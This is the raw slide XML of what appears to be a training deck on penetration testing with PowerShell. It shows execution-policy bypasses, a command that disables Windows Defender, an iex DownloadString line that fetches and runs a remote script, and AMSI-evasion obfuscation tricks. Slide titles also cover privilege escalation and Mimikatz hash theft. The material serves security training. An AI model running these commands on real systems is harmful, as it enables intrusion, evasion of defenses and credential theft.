                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>} | set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>executionpolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>echo "script" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerShell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>noprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Get-Content .runme.ps1 | PowerShell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>noprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 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6CE1F-C11B-434D-B9B2-56DE5E15CD25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455468" y="4852672"/>
            <a:ext cx="593840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Disable Windows Defender (need Administrative privileges)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MpPreference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DisableRealtimeMonitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> $true</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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61752-776B-41F8-AB6A-11982047C04F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498763" y="6012991"/>
            <a:ext cx="77590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More techniques see at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.netspi.com/blog/entryid/238/15-ways-to-bypass-the-powershell-execution-policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 10" descr="Зображення, що містить пляшка&#10;&#10;Опис створено з високим рівнем достовірності">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86248CE-9B72-4003-B5B5-8EC68C4FB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244" y="1875327"/>
            <a:ext cx="6073363" cy="1407028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CD99AA2C-236A-4B98-861F-8DDC522B3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23" y="5467381"/>
            <a:ext cx="4392890" cy="2622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6636D-1AB3-4733-868A-8486432CA646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7374081" y="3328671"/>
            <a:ext cx="288174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Bypass execution  policy with low privileges</a:t>
            </a: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280992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59E3-3631-49B8-9B11-070A004C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Obfuscation to bypass AMSI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6839A-07D9-486F-8E73-76B7F83813F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482427" y="5487739"/>
            <a:ext cx="1039988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Invoke-Obfuscation work description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Articles about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malvare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="120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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf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28FE2-194E-43EB-86DD-66B674C2E9B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516082" y="1875559"/>
            <a:ext cx="38342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Antimalware Scan Interface  (AMSI )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3DF89-A507-4527-8C36-8E1BA28FE08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="438150" y="2637559"/>
            <a:ext cx="1121848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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('https://raw.githubusercontent.com/HarmJ0y/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/master/PowerUp.ps1')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>use aliases: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> instead Invoke-Expression or instead of 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"(New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Net.WebClient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).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DownloadString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()" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>iwr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1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US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- we can replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to link on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>bitly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>: "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https://bit.ly/1qG1xey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- input "`" symbol and play  with upper and lower case symbols: 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`I`N`V`o`k`e`-`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>E`x`p`R`e`s`s`i`o`N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>- use replace and format operations:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>iex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raplace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> with   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>("{1}{0}" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>f'X','IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Calibri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27771-FE4C-49C9-ADDF-EA5517120AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484659" y="4227083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Tools to use:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Invoke-obfuscation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48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CB23-0A51-4BE0-B46E-1691D22E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AD Discovery. Power View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D0E72-3541-4D37-A401-07C1928B30C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837235" y="1686045"/>
            <a:ext cx="33315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Some commands of PowerView</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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AF1492-F1F3-4214-B561-84F350562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69" t="11137" r="36237" b="25986"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="421600" y="2289705"/>
            <a:ext cx="4033060" cy="33543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BD6D26-2AA5-4CE4-9A7A-25907E0F7AF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1728354" y="5646867"/>
            <a:ext cx="16976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Get—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NetUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200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267141-06D5-4713-AFAA-82C959F35E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7460672" y="5317821"/>
            <a:ext cx="16976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Get—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>NetUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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5502C22F-8F6F-4E80-B6E2-9ED0111AD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400300"/>
            <a:ext cx="5029200" cy="378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8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Penetration testing with PowerShell</vt:lpstr>
      <vt:lpstr>Oh No!  PowerShell? Really?</vt:lpstr>
      <vt:lpstr>Poc Description</vt:lpstr>
      <vt:lpstr>1. First steps</vt:lpstr>
      <vt:lpstr>1. First steps. Built in commands</vt:lpstr>
      <vt:lpstr>1. First Steps. .Net support.</vt:lpstr>
      <vt:lpstr>2. Bypass Execution Policy</vt:lpstr>
      <vt:lpstr>Obfuscation to bypass AMSI</vt:lpstr>
      <vt:lpstr>AD Discovery. Power View</vt:lpstr>
      <vt:lpstr>AD Discovery</vt:lpstr>
      <vt:lpstr>4. Establish  session to the DNS server</vt:lpstr>
      <vt:lpstr>5. Privilege escalation examples</vt:lpstr>
      <vt:lpstr>5. Escalate privileges to local admin</vt:lpstr>
      <vt:lpstr>5. Escalate privileges to local admin</vt:lpstr>
      <vt:lpstr>6. Run Mimikatz to collect NTLM hashes</vt:lpstr>
      <vt:lpstr>6. Run Mimikatz to collect NTLM hashes</vt:lpstr>
      <vt:lpstr>7. Run Mimikatz to collect NTLM hashes</vt:lpstr>
      <vt:lpstr>Some tools:</vt:lpstr>
      <vt:lpstr>Protection and Conclusion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1369</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-15T20:26:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-08T08:43:49Z</dcterms:modified>
</cp:coreProperties>
</file>